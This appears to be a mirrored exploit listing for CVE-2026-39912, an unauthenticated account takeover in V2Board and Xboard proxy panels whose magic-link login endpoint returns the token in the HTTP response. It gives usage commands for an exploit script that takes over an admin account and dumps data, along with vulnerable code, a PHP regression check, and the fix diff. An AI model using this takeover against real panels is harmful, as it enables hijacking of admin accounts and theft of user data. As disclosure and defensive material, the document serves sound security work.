## https://sploitus.com/exploit?id=E64D8AAD-B20A-5B0E-8F1A-9D1C31338DDA
# CVE-2026-39912 - Xboard / V2Board Unauth Account Takeover
**Magic Link Token Leak in loginWithMailLink**
| | |
|---|---|
| **CVE** | CVE-2026-39912 |
| **CVSS** | 9.1 (Critical) |
| **CWE** | CWE-201 (Insertion of Sensitive Information Into Sent Data) |
| **Affected** | V2Board >= 1.6.1 through 1.7.4 / Xboard all versions through 0.1.9+ |
| **Fixed** | Not yet (V2Board abandoned since June 2023) |
| **Disclosed** | 2026-04-09 |
| **Credit** | [Valentin Lobstein (Chocapikk)](https://github.com/Chocapikk) |
| **Writeup** | [chocapikk.com](https://chocapikk.com/posts/2026/xboard-v2board-account-takeover/) |
| **Fix PRs** | [V2Board #981](https://github.com/v2board/v2board/pull/981) / [Xboard #873](https://github.com/cedar2025/Xboard/pull/873) |
## TL;DR
The `loginWithMailLink` endpoint returns the magic login link directly in the HTTP response body instead of only sending it via email. An unauthenticated attacker who knows a registered email can take over any account - including admin - in two HTTP requests.
## Affected Software
- [V2Board](https://github.com/v2board/v2board) - Open-source proxy protocol management panel (8.7k stars, abandoned)
- [Xboard](https://github.com/cedar2025/Xboard) - Fork of V2Board (4k+ stars, actively maintained)
Both are widely deployed VPN/proxy panels, primarily in China. ZoomEye shows 7,000+ instances exposed on the internet.
## Requirements
- `login_with_mail_link_enable` must be enabled in admin settings (not enabled by default)
- A valid registered email address
## Usage
```bash
# Install dependencies
pip install requests
# Account takeover + data dump
python3 exploit.py http://target:7001 admin@demo.com
# Save dump to file
python3 exploit.py http://target:7001 admin@demo.com -o dump.json
```
## Demo
```
$ python3 exploit.py http://target:7001 admin@demo.com
Xboard / V2Board - Unauth Account Takeover
Magic Link Token Leak (CVE-2026-39912) | by Choc
V2Board >= 1.6.1 | Xboard
```
## Vulnerable Code
**V2Board** (`app/Http/Controllers/Passport/AuthController.php`):
```php
    $link // Token leaked to caller
]);
```
**Xboard** (`app/Services/Auth/MailLinkService.php`):
```php
$this->sendMailLinkEmail($user, $link);
return [true, $link]; // Same bug, inherited from fork
```
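For anyone auditing a panel of their own, the following is a minimal PHP illustration of the two return shapes side by side, plus a regression check that fails whenever a token that left by email shows up in the JSON body. This is added example code, not V2Board or Xboard code; `FakeMailer`, `MailLinkService`, the `/login?token=` path and the base URL are constructed for the example.

```php
<?php
// Added illustration, not V2Board or Xboard code. FakeMailer, MailLinkService,
// the '/login?token=' path and the base URL are all constructed for this example.

final class FakeMailer
{
    /** @var array<int, array{to: string, link: string}> */
    public array $outbox = [];

    public function send(string $to, string $link): void
    {
        // Stand-in for the real mail transport: record what would have been emailed.
        $this->outbox[] = ['to' => $to, 'link' => $link];
    }
}

final class MailLinkService
{
    public function __construct(private FakeMailer $mailer, private string $baseUrl) {}

    private function makeLink(): string
    {
        // 32 random bytes, hex-encoded; the mailbox should be the only place this lands.
        $token = bin2hex(random_bytes(32));
        return $this->baseUrl . '/login?token=' . $token;
    }

    /** Vulnerable shape: the link meant for the mailbox is also handed back to the caller. */
    public function handleVulnerable(string $email): array
    {
        $link = $this->makeLink();
        $this->mailer->send($email, $link);
        return [true, $link]; // whoever called the endpoint now holds the login token
    }

    /** Hardened shape: the caller learns only that a mail was queued. */
    public function handleFixed(string $email): array
    {
        $link = $this->makeLink();
        $this->mailer->send($email, $link);
        return [true, true];
    }
}

/** Mimics the controller turning the service result into a JSON body. */
function jsonBody(array $result): string
{
    return json_encode(['data' => $result[1]], JSON_UNESCAPED_SLASHES);
}

/** Regression check: no token that left via email may appear in the HTTP body. */
function bodyLeaksToken(string $body, FakeMailer $mailer): bool
{
    foreach ($mailer->outbox as $mail) {
        $token = substr($mail['link'], strrpos($mail['link'], '=') + 1);
        if ($token !== '' && str_contains($body, $token)) {
            return true;
        }
    }
    return false;
}

foreach (['handleVulnerable', 'handleFixed'] as $method) {
    $mailer = new FakeMailer();
    $service = new MailLinkService($mailer, 'https://panel.example.test');
    $body = jsonBody($service->$method('user@example.test'));
    printf("%-16s body=%s leaks=%s\n", $method, $body, bodyLeaksToken($body, $mailer) ? 'yes' : 'no');
}
```

Runs on PHP 8 or later. The `bodyLeaksToken` check is the kind of assertion worth adding to the panel's test suite alongside the fix, since it catches the leak regardless of where in the response the link is placed.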
## The Fix
```diff
- return [true, $link];
+ return [true, true];
```
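Review bot: `return [true, true];` closes the leak at this return site, but the second array slot now carries a constant with no meaning, so any caller that used to read the link from it should be reviewed, in particular the controller that serialises the result into the JSON body (the `$link // Token leaked to caller` fragment shown above must not survive on the V2Board side). Returning a single boolean instead of `[true, true]` would also remove the spare slot that invited the leak in the first place.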
## References
- [V2Board - Vulnerable code (line 71)](https://github.com/v2board/v2board/blob/0ca47622a50116d0ddd7ffb316b157afb57d25e8/app/Http/Controllers/Passport/AuthController.php#L71)
- [Xboard - Vulnerable code (line 49)](https://github.com/cedar2025/Xboard/blob/1fe6531924cc1ec662a88b9ef725afcf78d660bc/app/Services/Auth/MailLinkService.php#L49)
- [Original commit introducing the bug (2022-06-27)](https://github.com/v2board/v2board/commit/bdb10bed32c5f37df2f0872c3cb354e9b7a293bd)